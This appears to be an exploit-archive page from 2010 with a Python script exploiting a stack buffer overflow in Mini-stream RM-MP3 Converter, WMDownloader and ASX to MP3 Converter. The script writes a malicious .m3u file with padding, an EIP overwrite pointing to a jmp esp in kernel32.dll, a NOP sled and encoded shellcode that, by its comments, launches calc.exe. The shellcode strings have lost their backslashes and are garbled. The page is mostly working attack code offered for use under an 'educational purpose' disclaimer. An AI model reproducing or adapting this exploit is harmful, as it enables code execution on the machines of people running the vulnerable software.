Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter Stack Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter Stack Buffer Overflow Exploit
# Published : 2010-08-02
# Author : Praveen Darshanam
# Previous Title : HTML Email Creator 2.42 build 718 Buffer Overflow Exploit (SEH)
# Next Title : Apple iOS pdf Jailbreak Exploit

####################################################################################
# Exploit Title: Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3
Converter Stack Buffer Overflow Exploit
#
# Tested on Windows XP SP3 Pro
# Found By : Cyber-Zone (ABDELKHALEK)
# http://www.securityfocus.com/bid/34494
# The way exploit written is slightly different than above Vulnerability
# Refer:
http://downloads.securityfocus.com/vulnerabilities/exploits/34494-2.pl
# Download product : http://www.rm-to-mp3.net/downloads/WMDownloader.exe
#         http://www.rm-to-mp3.net/downloads/Mini-streamRM-MP3Converter.exe
#         http://www.rm-to-mp3.net/downloads/ASXtoMP3Converter.exe
# THIS EXPLOIT WORKS FOR ALL THE 3 INSTALLERS ABOVE
# corelanc0d3r: Greetz from INDIA
# My First BoF Exploit
# Author: Praveen Darshanam
# Contact: praveen_recker@sify.com
# Blog: http://darshanams.blogspot.com
#
#This was strictly written for educational purpose. Use it at your own risk.
#Author will not bare responsibility for any damages watsoever.
#
# Vinod, wish u happy journey :) ..... enjoy maadi !!!
####################################################################################

handler = "ftp://"
buff1 = "D" * 17418
#eip = "x7DxA5x04x10"
#0x1004A57D  jmp esp   C:Program FilesMini-streamWM
DownloaderWDfilter01.dll
#ABOVE ADDRESSES DIDN'T WORK FOR ME
eip = "x7bx46x86x7c"     # 0x7C86467B      jmp esp   kernel32.dll

# both SHELLCODES pops calc.exe
code2exec =
("xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaax3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6bxf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7axcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05x7fxe8x7bxca")
"""
code2exec =
("x31xc9xdaxd4xb1x33xbdxecx71x94xdexd9x74x24xf4x5fx31x6fx15x03x6fx15x83x2bx75x76x2bx4fx9exffxd4xafx5fx60x5cx4ax6exb2x3ax1fxc3x02x48x4dxe8xe9x1cx65x7bx9fx88x8axccx2axefxa5xcdx9ax2fx69x0dxbcxd3x73x42x1exedxbcx97x5fx2axa0x58x0dxe3xafxcbxa2x80xedxd7xc3x46x7ax67xbcxe3xbcx1cx76xedxecx8dx0dxa5x14xa5x4ax16x25x6ax89x6ax6cx07x7ax18x6fxc1xb2xe1x5ex2dx18xdcx6fxa0x60x18x57x5bx17x52xa4xe6x20xa1xd7x3cxa4x34x7fxb6x1ex9dx7ex1bxf8x56x8cxd0x8ex31x90xe7x43x4axacx6cx62x9dx25x36x41x39x6execxe8x18xcax43x14x7axb2x3cxb0xf0x50x28xc2x5ax3exafx46xe1x07xafx58xeax27xd8x69x61xa8x9fx75xa0x8dx40x94x61xfbxe8x01xe0x46x75xb2xdex84x80x31xebx74x77x29x9ex71x33xedx72x0bx2cx98x74xb8x4dx89x16x5fxdex51xf7xfax66xf3x07")
"""
noop = "x90" * 10
# 4 bytes is enough to make ESP point to SHELLCODE
print "code2exec offset is:",(40000 - len(handler) - len(buff1) - len(eip) -
len(noop) - len(code2exec))

buff2 = "Z" * (40000 - len(handler) - len(buff1) - len(eip) - len(noop) -
len(code2exec))
mal_buff = handler + buff1 + eip + noop + code2exec + buff2
try:
    wmdownloader = open ("wmdownloader_codeexec.m3u","w")
    wmdownloader.write (mal_buff)
    wmdownloader.close()
    print "nn[+] Coded by Praveen Darshanam"
    print "[+] Malicious M3U File Successfully creatednn"
except:
    print "n[+] Unable to create file . . .n"